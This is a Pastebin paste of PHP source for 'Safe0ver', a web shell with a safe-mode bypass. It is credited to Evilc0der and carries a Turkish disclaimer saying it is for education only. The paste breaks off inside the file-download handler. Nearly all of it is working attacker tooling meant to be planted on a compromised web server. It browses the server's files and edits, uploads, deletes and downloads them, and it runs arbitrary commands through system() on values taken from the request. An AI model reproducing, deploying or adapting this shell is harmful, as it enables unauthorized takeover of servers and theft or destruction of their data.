API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 3rd, 2017
114
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.74 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3.  
  4. /*
  5. *****************************************************************************************
  6. * Safe0ver Shell //Safe Mod Bypass By Evilc0der *
  7. *****************************************************************************************
  8. * Evilc0der.org is a Platform Which You can Publish Your Shell Script *
  9.  
  10. *****************************************************************************************
  11.  
  12. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  13. !! Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz.
  14. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  15. */
  16.  
  17.  
  18. /*Setting some envirionment variables...*/
  19.  
  20. /* I added this to ensure the script will run correctly...
  21. Please enter the Script's filename in this variable. */
  22. $SFileName=$idi0t;
  23.  
  24. /* uncomment the two following variables if you want to use http
  25. authentication. This will password protect your PHPShell */
  26. //$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */
  27. //$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */
  28.  
  29. error_reporting(0);
  30. $PHPVer=phpversion();
  31. $isGoodver=(intval($PHPVer[0])>=4);
  32. $scriptTitle = "Safe0ver";
  33. $scriptident = "$scriptTitle By Evilc0der.org";
  34.  
  35. $urlAdd = "";
  36. $formAdd = "";
  37.  
  38. function walkArray($array){
  39. while (list($key, $data) = each($array))
  40. if (is_array($data)) { walkArray($data); }
  41. else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
  42. }
  43.  
  44. if (isset($_PUT)) walkArray($_PUT);
  45. if (isset($_GET)) walkArray($_GET);
  46. if (isset($_POST)) walkArray($_POST);
  47.  
  48.  
  49. $pos = strpos($urlAdd, "s=r");
  50. if (strval($pos) != "") {
  51. $urlAdd= substr($urlAdd, 0, $pos);
  52. }
  53.  
  54. $urlAdd .= "&s=r&";
  55.  
  56. if (empty($Pmax))
  57. $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */
  58. if (empty($Pidx))
  59. $Pidx = 0;
  60.  
  61. $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
  62. $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
  63.  
  64. $scriptdate = "7 Subat 2007";
  65. $scriptver = "Bet@ Versiyon";
  66. $LOCAL_IMAGE_DIR = "img";
  67. $REMOTE_IMAGE_URL = "img";
  68. $img = array(
  69. "Edit" => "edit.gif",
  70. "Download" => "download.gif",
  71. "Upload" => "upload.gif",
  72. "Delete" => "delete.gif",
  73. "View" => "view.gif",
  74. "Rename" => "rename.gif",
  75. "Move" => "move.gif",
  76. "Copy" => "copy.gif",
  77. "Execute" => "exec.gif"
  78. );
  79.  
  80. while (list($id, $im)=each($img))
  81. if (file_exists("$LOCAL_IMAGE_DIR/$im"))
  82. $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
  83. else
  84. $img[$id] = "[$id]";
  85.  
  86.  
  87.  
  88.  
  89. /* HTTP AUTHENTICATION */
  90.  
  91. if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
  92. setcookie("noauth","");
  93. Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
  94. Header( "HTTP/1.0 401 Unauthorized");
  95. echo "Your username or password is incorrect";
  96. exit ;
  97.  
  98. }
  99.  
  100. function buildUrl($display, $url) {
  101. global $urlAdd;
  102. $url = $SFileName . "?$urlAdd$url";
  103. return "<a href=\"$url\">$display</a>";
  104. }
  105.  
  106. function sp($mp) {
  107. for ( $i = 0; $i < $mp; $i++ )
  108. $ret .= "&nbsp;";
  109. return $ret;
  110. }
  111.  
  112. function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); }
  113.  
  114. function Mydeldir($Fdir) {
  115. if (is_dir($Fdir)) {
  116. $Fh=@opendir($Fdir);
  117. while ($Fbuf = readdir($Fh))
  118. if (($Fbuf != ".") && ($Fbuf != ".."))
  119. Mydeldir("$Fdir/$Fbuf");
  120. @closedir($Fh);
  121. return rmdir($Fdir);
  122. } else {
  123. return unlink($Fdir);
  124. }
  125. }
  126.  
  127.  
  128. function arrval ($array) {
  129. list($key, $data) = $array;
  130. return $data;
  131. }
  132.  
  133. function formatsize($insize) {
  134. $size = $insize;
  135. $add = "B";
  136. if ($size > 1024) {
  137. $size = intval(intval($size) / 1.024)/1000;
  138. $add = "KB";
  139. }
  140. if ($size > 1024) {
  141. $size = intval(intval($size) / 1.024)/1000;
  142. $add = "MB";
  143. }
  144. if ($size > 1024) {
  145. $size = intval(intval($size) / 1.024)/1000;
  146. $add = "GB";
  147. }
  148. if ($size > 1024) {
  149. $size = intval(intval($size) / 1.024)/1000;
  150. $add = "TB";
  151. }
  152. return "$size $add";
  153. }
  154.  
  155. if ($cmd != "downl") {
  156. ?>
  157.  
  158. <!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
  159. <HTML>
  160. <HEAD>
  161. <STYLE>
  162. <!--
  163. A{ text-decoration:none; color:navy; font-size: 12px }
  164. body {
  165. font-size: 12px;
  166. font-family: arial, helvetica;
  167. scrollbar-width: 5;
  168. scrollbar-height: 5;
  169. scrollbar-face-color: white;
  170. scrollbar-shadow-color: silver;
  171. scrollbar-highlight-color: white;
  172. scrollbar-3dlight-color:silver;
  173. scrollbar-darkshadow-color: silver;
  174. scrollbar-track-color: white;
  175. scrollbar-arrow-color: black;
  176. background-color: #CCCCCC;
  177. }
  178. Table { font-size: 12px; }
  179. TR{ font-size: 12px; }
  180. TD{
  181. font-size: 12px;
  182. font-family: arial, helvetical;
  183. BORDER-LEFT: black 0px solid;
  184. BORDER-RIGHT: black 0px solid;
  185. BORDER-TOP: black 0px solid;
  186. BORDER-BOTTOM: black 0px solid;
  187. COLOR: black;
  188. background: #CCCCCC;
  189. }
  190. .border{ BORDER-LEFT: black 1px solid;
  191. BORDER-RIGHT: black 1px solid;
  192. BORDER-TOP: black 1px solid;
  193. BORDER-BOTTOM: black 1px solid;
  194. }
  195. .none { BORDER-LEFT: black 0px solid;
  196. BORDER-RIGHT: black 0px solid;
  197. BORDER-TOP: black 0px solid;
  198. BORDER-BOTTOM: black 0px solid;
  199. }
  200. .inputtext {
  201. background-color: #EFEFEF;
  202. font-family: arial, helvetica;
  203. border: 1px solid #000000;
  204. height: 20;
  205. }
  206. .lighttd { background: #F8F8F8;
  207. }
  208. .darktd { background: #CCCCCC;
  209. }
  210. input { font-family: arial, helvetica;
  211. }
  212. .inputbutton {
  213. background-color: #CCCCCC;
  214. border: 1px solid #000000;
  215. border-width: 1px;
  216. height: 20;
  217. }
  218. .inputtextarea {
  219. background-color: #CCCCCC;
  220. border: 1px solid #000000;
  221. scrollbar-width: 5;
  222. scrollbar-height: 5;
  223. scrollbar-face-color: #EFEFEF;
  224. scrollbar-shadow-color: silver;
  225. scrollbar-highlight-color: #EFEFEF;
  226. scrollbar-3dlight-color:silver;
  227. scrollbar-darkshadow-color: silver;
  228. scrollbar-track-color: #EFEFEF;
  229. scrollbar-arrow-color: black;
  230. }
  231. .top { BORDER-TOP: black 1px solid; }
  232. .textin { BORDER-LEFT: silver 1px solid;
  233. BORDER-RIGHT: silver 1px solid;
  234. BORDER-TOP: silver 1px solid;
  235. BORDER-BOTTOM: silver 1px solid;
  236. width: 99%; font-size: 12px; font-weight: bold; color: Black;
  237. }
  238. .notop { BORDER-TOP: black 0px solid; }
  239. .bottom { BORDER-BOTTOM: black 1px solid; }
  240. .nobottom { BORDER-BOTTOM: black 0px solid; }
  241. .left { BORDER-LEFT: black 1px solid; }
  242. .noleft { BORDER-LEFT: black 0px solid; }
  243. .right { BORDER-RIGHT: black 1px solid; }
  244. .noright { BORDER-RIGHT: black 0px solid; }
  245. .silver{ BACKGROUND: #CCCCCC; }
  246. body,td,th {
  247. color: #660000;
  248. }
  249. a:link {
  250. color: #000000;
  251. text-decoration: none;
  252. }
  253. a:hover {
  254. color: #00FF00;
  255. text-decoration: none;
  256. }
  257. a:active {
  258. color: #666666;
  259. text-decoration: none;
  260. }
  261. a:visited {
  262. text-decoration: none;
  263. }
  264. .style5 {
  265. color: #660000;
  266. font-weight: bold;
  267. }
  268. -->
  269. </STYLE>
  270. <TITLE><?php echo $SFileName ?></TITLE>
  271. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
  272. <body topmargin="0" leftmargin="0">
  273. <div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
  274. <table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
  275. <tr>
  276. <td width="100%" class="silver border"><center>
  277. <strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
  278. </center></td>
  279. </tr>
  280. </table>
  281. <table width=100% height="100%" NOWRAP border="0">
  282. <tr NOWRAP>
  283. <td width="100%" NOWRAP><br>
  284.  
  285. <?php
  286. }
  287.  
  288. if ( $cmd=="dir" ) {
  289. $h=@opendir($dir);
  290. if ($h == false) {
  291. echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
  292. Klas�r Listelenemiyor!L�tfen Bypass B�l�m�n� Deneyin.<br>".sp(3)."\n
  293. Script Gecisi Tamamlayamadi!
  294. <br><br>".sp(3)."\n
  295. Klas�re Girmek Icin yetkiniz Olduguna emin Olunuz...
  296. <br><br></font>\n\n\n\n";
  297. }
  298. if (function_exists('realpath')) {
  299. $partdir = realpath($dir);
  300. }
  301. else {
  302. $partdir = $dir;
  303. }
  304. if (strlen($partdir) >= 100) {
  305. $partdir = substr($partdir, -100);
  306. $pos = strpos($partdir, "/");
  307. if (strval($pos) != "") {
  308. $partdir = "<-- ...".substr($partdir, $pos);
  309. }
  310. $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
  311. $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
  312. $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
  313. }
  314. ?>
  315. <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
  316. <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
  317. <tr>
  318. <td width="100%" class="silver border">
  319. <center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
  320. </td>
  321. </tr>
  322. </table>
  323. <br>
  324. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  325. <tr>
  326. <td class="border nobottom noright">
  327. &nbsp;Listeliyor:&nbsp;
  328. </td>
  329. <td width="100%" class="border nobottom noleft">
  330. <table width="100%" border="0" cellpadding="1" cellspacing="0">
  331. <tr>
  332. <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
  333. <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
  334. </tr>
  335. </table>
  336.  
  337. </td>
  338. </tr>
  339. </table>
  340. <!-- </form> -->
  341. <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
  342. <tr>
  343. <td width="100%" NOWRAP class="silver border">
  344. &nbsp;Dosya Adi&nbsp;
  345. </td>
  346. <td NOWRAP class="silver border noleft">
  347. &nbsp;Yapilabilecekler&nbsp;&nbsp;
  348. </td>
  349. <td NOWRAP class="silver border noleft">
  350. &nbsp;Boyut&nbsp;
  351. </td>
  352. <td width=1 NOWRAP class="silver border noleft">
  353. &nbsp;Yetkiler&nbsp;
  354. </td>
  355. <td NOWRAP class="silver border noleft">
  356. &nbsp;Son D�zenleme&nbsp;
  357. </td>
  358. <tr>
  359. <?php
  360.  
  361.  
  362. /* <!-- This whole heap of junk is the sorting section... */
  363.  
  364. $dirn = array();
  365. $filen = array();
  366. $filesizes = 0;
  367. while ($buf = readdir($h)) {
  368. if (is_dir("$dir/$buf"))
  369. $dirn[] = $buf;
  370. else
  371. $filen[] = $buf;
  372. }
  373. $dirno = count($dirn) + 1;
  374. $fileno = count($filen) + 1;
  375.  
  376. function mycmp($a, $b){
  377. if ($a == $b) return 0;
  378. return (strtolower($a) < strtolower($b)) ? -1 : 1;
  379. }
  380.  
  381. if (function_exists("usort")) {
  382. usort($dirn, "mycmp");
  383. usort($filen, "mycmp");
  384. }
  385. else {
  386. sort ($dirn);
  387. sort ($filen);
  388. }
  389. reset ($dirn);
  390. reset ($filen);
  391. if (function_exists('array_merge')) {
  392. $filelist = array_merge ($dirn, $filen);
  393. }
  394. else {
  395. $filelist = $dirn + $filen;
  396. }
  397.  
  398.  
  399. if ( count($filelist)-1 > $Pmax ) {
  400. $from = $Pidx * $Pmax;
  401. $to = ($Pidx + 1) * $Pmax-1;
  402. if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
  403. $to = count($filelist) - 1;
  404. if ($to > count($filelist)-1)
  405. $to = count($filelist)-1;
  406. $Dcontents = array();
  407. For ($Fi = $from; $Fi <= $to; $Fi++) {
  408. $Dcontents[] = $filelist[$Fi];
  409. }
  410.  
  411. }
  412. else {
  413. $Dcontents = $filelist;
  414. }
  415.  
  416. $tdcolors = array("lighttd", "darktd");
  417.  
  418. while (list ($key, $file) = each ($Dcontents)) {
  419. if (!$tdcolor=arrval(each($tdcolors))) {
  420. reset($tdcolors);
  421. $tdcolor = arrval(each($tdcolors)); }
  422.  
  423. if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
  424. /* <!-- Dirname --> */
  425. echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
  426. /* <!-- Actions --> */
  427. echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
  428. /* <!-- Rename --> */
  429. if ( ($file != ".") && ($file != "..") )
  430. echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
  431. /* <!-- Delete --> */
  432. if ( ($file != ".") && ($file != "..") )
  433. echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
  434. /* <!-- End of Actions --> */
  435. echo "&nbsp;&nbsp;</center></td>\n";
  436. /* <!-- Size --> */
  437. echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
  438. /* <!-- Attributes --> */
  439. echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
  440. echo "<strong>D</strong>";
  441. if ( @is_readable("$dir/$file") ) {
  442. echo "<strong>R</strong>";
  443. }
  444. if (function_exists('is_writeable')) {
  445. if ( @is_writeable("$dir/$file") ) {
  446. echo "<strong>W</stong>";
  447. }
  448. }
  449. else {
  450. echo "<strong>(W)</stong>";
  451. }
  452. if ( @is_executable("$dir/$file") ) {
  453. echo "<Strong>X<strong>";
  454. }
  455. echo "&nbsp;&nbsp;</td>\n";
  456. /* <!-- Date --> */
  457. echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
  458. echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
  459. echo "</td>";
  460. echo "</tr>\n";
  461.  
  462. }
  463. else { /* <!-- Then it must be a File... --> */
  464. /* <!-- Filename --> */
  465. if ( @is_readable("$dir/$file") )
  466. echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
  467. else
  468. echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
  469. /* <!-- Actions --> */
  470. echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
  471. /* <!-- Rename --> */
  472. echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
  473. /* <!-- Edit --> */
  474. if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
  475. echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
  476. /* <!-- Copy --> */
  477. echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
  478. /* <!-- Move --> */
  479. if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
  480. echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
  481. /* <!-- Delete --> */
  482. echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
  483. /* <!-- Download --> */
  484. echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
  485. /* <!-- Execute --> */
  486. if ( @is_executable("$dir/$file") )
  487. echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
  488. /* <!-- End of Actions --> */
  489. echo sp(2)."</center></td>\n";
  490. /* <!-- Size --> */
  491. echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
  492. $size = @filesize("$dir/$file");
  493. If ($size != false) {
  494. $filesizes += $size;
  495. echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
  496. }
  497. else
  498. echo "&nbsp;&nbsp;<strong>0 B<strong>";
  499. echo "&nbsp;&nbsp;</td>\n";
  500.  
  501. /* <!-- Attributes --> */
  502. echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
  503.  
  504. if ( @is_readable("$dir/$file") )
  505. echo "<strong>R</strong>";
  506. if ( @is_writeable("$dir/$file") )
  507. echo "<strong>W</stong>";
  508. if ( @is_executable("$dir/$file") )
  509. echo "<Strong>X<strong>";
  510. if (function_exists('is_uploaded_file')){
  511. if ( @is_uploaded_file("$dir/$file") )
  512. echo "<Strong>U<strong>";
  513. }
  514. else {
  515. echo "<Strong>(U)<strong>";
  516. }
  517. echo "&nbsp;&nbsp;</td>\n";
  518. /* <!-- Date --> */
  519. echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
  520. echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
  521. echo "</td>";
  522. echo "</tr>\n";
  523. }
  524. }
  525.  
  526. echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
  527. echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klas�r,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
  528. echo "</td><td NOWRAP class=\"silver border noleft\">\n";
  529. echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
  530.  
  531. function printpagelink($a, $b, $link = ""){
  532. if ($link != "")
  533. echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
  534. else
  535. echo "<b>| $a - $b |</b>";
  536. }
  537.  
  538. if ( count($filelist)-1 > $Pmax ) {
  539. echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
  540. $Fi = 0;
  541. while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
  542. $from = $Fi*$Pmax;
  543. while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
  544. $to = ($Fi + 1) * $Pmax - 1;
  545. if ($Fi == $Pidx)
  546. $link="";
  547. else
  548. $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
  549. printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
  550. echo "&nbsp;&nbsp;&nbsp;";
  551. $Fi++;
  552. }
  553. $from = $Fi*$Pmax;
  554. while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
  555. $to = count($filelist)-1;
  556. if ($Fi == $Pidx)
  557. $link="";
  558. else
  559. $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
  560. printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
  561.  
  562.  
  563. echo "</center></td></tr></table></td></tr>";
  564. }
  565.  
  566.  
  567. echo "</table>\n<br><table NOWRAP>";
  568.  
  569. if ($isGoodver) {
  570. echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
  571. }
  572. else {
  573. echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
  574. }
  575. /* <!-- Other Actions --> */
  576. echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
  577. echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
  578. buildUrl( "| Yeni Klas�r |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
  579. buildUrl( "| Dosya Y�kle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
  580. echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
  581. echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
  582. echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klas�r:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
  583. echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
  584. echo "<table NOWRAP>";
  585. echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klas�r.</td></tr>\n";
  586. echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
  587. echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
  588. echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
  589. echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
  590. echo "</table></td>";
  591. echo "</table>";
  592. echo "<br>";
  593. @closedir($h);
  594. }
  595. elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
  596. echo system("$file");
  597. }
  598. elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
  599. echo "<center><table><tr><td NOWRAP>" ;
  600. if ($auth == "yes") {
  601. if (Mydeldir($file)==false) {
  602. echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
  603. }
  604. else {
  605. echo "Successfully removed \"$file\"<br>";
  606. }
  607. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form>";
  608. }
  609. else {
  610. echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
  611. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  612. <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
  613. <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
  614. <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
  615. <input type=\"hidden\" name=\"file\" value=\"$file\">
  616. <input type=\"hidden\" name=\"auth\" value=\"yes\">
  617. <input type=\"submit\" value=\"Yes\"></form>
  618. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  619. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  620. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  621. <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
  622. }
  623. echo "</td></tr></center>";
  624. }
  625. elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ;
  626. if ($auth == "yes") {
  627. if (@unlink($file)==false) {
  628. echo "Could not remove \"$file\"<br>";
  629. }
  630. else {
  631. echo "Successfully removed \"$file\"<br>";
  632. }
  633. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form>";
  634. }
  635. else {
  636. echo "Are you sure you want to delete \"$file\" ?
  637. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  638. <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
  639. <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
  640. <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
  641. <input type=\"hidden\" name=\"file\" value=\"$file\">
  642. <input type=\"hidden\" name=\"auth\" value=\"yes\">
  643.  
  644. <input type=\"submit\" value=\"Yes\"></form>
  645. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  646. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  647. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  648. <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
  649. }
  650. echo "</td></tr></center>";
  651. }
  652. elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
  653. echo "<center><table><tr><td NOWRAP>";
  654. $i = 1;
  655. while (file_exists("$lastdir/newfile$i.txt"))
  656. $i++;
  657. $file = fopen("$lastdir/newfile$i.txt", "w+");
  658. if ($file == false)
  659. echo "Could not create the new file...<br>";
  660. else
  661. echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
  662. echo "
  663. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  664. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  665. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  666. <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\">
  667. </form></center>
  668. </td></tr></table></center> ";
  669. }
  670. elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
  671. echo "<center><table><tr><td NOWRAP>" ;
  672. $i = 1;
  673. while (is_dir("$lastdir/newdir$i"))
  674. $i++;
  675. $file = mkdir("$lastdir/newdir$i", 0777);
  676. if ($file == false)
  677. echo "Could not create the new directory...<br>";
  678. else
  679. echo "Successfully created: \"$lastdir/newdir$i\"<br>";
  680. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
  681. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  682. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  683. <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\">
  684. </form></center></td></tr></table></center>";
  685. }
  686. elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
  687. $contents = "";
  688. $fc = @file( $file );
  689. while ( @list( $ln, $line ) = each( $fc ) ) {
  690. $contents .= htmlentities( $line ) ;
  691. }
  692. echo "<br><center><table><tr><td NOWRAP>";
  693. echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
  694. echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
  695. echo "<strong>EDIT FILE: </strong>$file<br>\n";
  696. echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
  697. echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
  698. echo "<input type=\"submit\" value=\"Save\">";
  699. echo "</form>";
  700. echo "</td></tr></table></center>";
  701. }
  702. elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
  703. $fo = fopen($file, "w");
  704. $wrret = fwrite($fo, stripslashes($contents));
  705. $clret = fclose($fo);
  706. }
  707. elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
  708. $downloadfile = urldecode($file);
  709. if (function_exists("basename"))
  710. $downloadto = basename ($downloadfile);
  711. else
  712. $downloadto = "download.ext";
  713. if (!file_exists("$downloadfile"))
  714. echo "The file does not exist";
  715. else {
  716. $size = @filesize("$downloadfile");
  717. if ($size != false) {
  718. $add="; size=$size";
  719. }
  720. else {
  721. $add="";
  722. }
  723. header("Content-Type: application/download");
  724. header("Content-Disposition: attachment; filename=$downloadto$add");
